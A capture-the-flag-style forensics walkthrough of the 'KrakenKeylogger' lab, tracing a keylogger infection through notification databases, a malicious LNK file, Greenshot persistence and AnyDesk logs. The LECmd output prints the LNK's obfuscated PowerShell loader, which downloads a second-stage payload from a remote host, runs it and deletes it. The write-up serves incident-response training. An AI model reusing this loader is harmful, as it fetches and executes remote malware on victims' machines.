Scenario

An employee at a large company was assigned a task with a two-day deadline. Realizing that he could not complete the task in that timeframe, he sought help from someone else. After one day, he received a notification from that person who informed him that he had managed to finish the assignment and sent it to the employee as a test. However, the person also sent a message to the employee stating that if he wanted the completed assignment, he would have to pay $160.

The helper’s demand for payment revealed that he was a threat actor. The company’s digital forensics team was called in to investigate and identify the attacker, determine the extent of the attack, and assess potential data breaches. The team must analyze the employee’s computer and communication logs to prevent similar attacks in the future.

Provided Files

Questions

1. What is the the web messaging app the employee used to talk to the attacker?

A web messaging app if installed on a host should send notifications. So we can analyze the notification database wpndatabase.db located in

\Users\OMEN\AppData\Local\Microsoft\Windows\Notifications using SQLite:

We find the user was using telegram

2. What is the password for the protected ZIP file sent by the attacker to the employee?

Clicking on the row we found earlier, we get the complete notification that contains the password:

3. What domain did the attacker use to download the second stage of the malware?

Analyzing the LNK file using LeCmd.exe:

 .\LECmd.exe -f "C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk"

We get the following result:

LECmd version 1.5.1.0

Author: Eric Zimmerman ([email protected])
https://github.com/EricZimmerman/LECmd

Command line: -f C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk

Warning: Administrator privileges not found!


Processing C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk

Source file: C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk
  Source created:  2025-08-19 18:29:35
  Source modified: 2023-05-11 02:46:14
  Source accessed: 2025-08-19 18:37:03

--- Header ---
  Target created:  null
  Target modified: null
  Target accessed: null

  File size (bytes): 0
  Flags: HasTargetIdList, HasRelativePath, HasArguments, HasIconLocation, IsUnicode, HasExpIcon
  File attributes: 0
  Icon index: 67
  Show window: SwShowminnoactive (Display the window as minimized without activating it.)

Relative Path: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Arguments: -ExecutionPolicy UnRestricted $ProgressPreference = 0;
function nvRClWiAJT($OnUPXhNfGyEh){$OnUPXhNfGyEh[$OnUPXhNfGyEh.Length..0] -join('')};
function sDjLksFILdkrdR($OnUPXhNfGyEh){
$vecsWHuXBHu = nvRClWiAJT $OnUPXhNfGyEh;
for($TJuYrHOorcZu = 0;$TJuYrHOorcZu -lt $vecsWHuXBHu.Length;$TJuYrHOorcZu += 2){
try{$zRavFAQNJqOVxb += nvRClWiAJT $vecsWHuXBHu.Substring($TJuYrHOorcZu,2)}
catch{$zRavFAQNJqOVxb += $vecsWHuXBHu.Substring($TJuYrHOorcZu,1)}};$zRavFAQNJqOVxb};
$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht';
$cDkdhkGBtl = $env:APPDATA + '\' + ($NpzibtULgyi -split '/')[-1];
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing;
[IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi);
& $cDkdhkGBtl;
sleep 3;
rm $cDkdhkGBtl;
Icon Location: C:\Windows\System32\imageres.dll

--- Target ID information (Format: Type ==> Value) ---

  Absolute path: This PC\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

  -Root folder: GUID ==> This PC

  -Drive letter ==> C:

  -Directory ==> Windows
    Short name: Windows
    Modified:
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: Windows
    Created:
    Last access:

  -Directory ==> System32
    Short name: System32
    Modified:
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: System32
    Created:
    Last access:

  -Directory ==> WindowsPowerShell
    Short name: WindowsPowerShell
    Modified:
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: WindowsPowerShell
    Created:
    Last access:

  -Directory ==> v1.0
    Short name: v1.0
    Modified:
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: v1.0
    Created:
    Last access:

  -File ==> powershell.exe
    Short name: powershell.exe
    Modified:
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: powershell.exe
    Created:
    Last access:

--- End Target ID information ---

--- Extra blocks information ---

>> Icon environment data block
   Icon path: %SystemRoot%\System32\imageres.dll

>> Special folder data block
   Special Folder ID: 37

>> Known folder data block
   Known folder GUID: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> System

>> Property store data block (Format: GUID\ID Description ==> Value)
   46588ae2-4cbc-4338-bbfc-139326986dce\4      SID                                 ==> S-1-5-21-66729632-1778321671-188542082-1001

We find the domain here however we need to decode it:

$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht';

To decode it, we should reverse the obfuscated string, then swap characters in each 2-char chunk

4. What is the name of the command that the attacker injected using one of the installed LOLAPPS on the machine to achieve persistence?

The question is asking about LOLAPPS. Google searching LOLAPPS, we find the following list:

We need to know which app was installed on the host. Looking at AppData\Roaming, we find Greenshot:

Opening the folder we find a .ini file:

Inside the file, we find the command:

jlhgfjhdflghjhuhuh

5. What is the complete path of the malicious file that the attacker used to achieve persistence?

We can find the complete file in the same file:

6. What is the name of the application the attacker utilized for data exfiltration?

We can find in videos anydesk installed:

7. What is the IP address of the attacker?

Since the attacker use AnyDesk, we can analyze ad.trace file:

Inside ad.trace we find the IP:

KrakenKeylloger Lab – CyberDenfenders

Scenario

Provided Files

Questions

1. What is the the web messaging app the employee used to talk to the attacker?

2. What is the password for the protected ZIP file sent by the attacker to the employee?

3. What domain did the attacker use to download the second stage of the malware?

4. What is the name of the command that the attacker injected using one of the installed LOLAPPS on the machine to achieve persistence?

5. What is the complete path of the malicious file that the attacker used to achieve persistence?

6. What is the name of the application the attacker utilized for data exfiltration?

7. What is the IP address of the attacker?

Support – Hack The Box

Timelapse – Hack The Box

Sauna – Hack The Box

Forest

Active – Hack The Box

Scenario

Provided Files

Questions

1. What is the the web messaging app the employee used to talk to the attacker?

2. What is the password for the protected ZIP file sent by the attacker to the employee?

3. What domain did the attacker use to download the second stage of the malware?

4. What is the name of the command that the attacker injected using one of the installed LOLAPPS on the machine to achieve persistence?

5. What is the complete path of the malicious file that the attacker used to achieve persistence?

6. What is the name of the application the attacker utilized for data exfiltration?

7. What is the IP address of the attacker?

Related Posts

Trending now